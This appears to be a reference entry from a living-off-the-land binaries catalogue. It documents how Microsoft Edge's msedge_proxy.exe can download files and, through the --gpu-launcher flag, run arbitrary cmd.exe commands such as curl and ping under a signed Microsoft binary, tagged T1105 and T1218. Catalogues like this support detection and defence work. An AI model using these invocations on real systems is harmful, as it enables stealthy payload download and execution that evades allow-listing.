.. /msedge_proxy.exe
Star

Microsoft Edge Browser


Paths:

Acknowledgements:

Download

msedge_proxy will download malicious file.
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe http://example.com/test.zip
Usecase: Download file from the internet
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105



Edge will silently download the file.
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\Desktop\\test.json &&"
Usecase: Download file from the internet
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105



Execute

msedge_proxy.exe will execute file in the background
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\cmd.exe /c ping google.com &&"
Usecase: Executes a process under a trusted Microsoft signed binary
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1218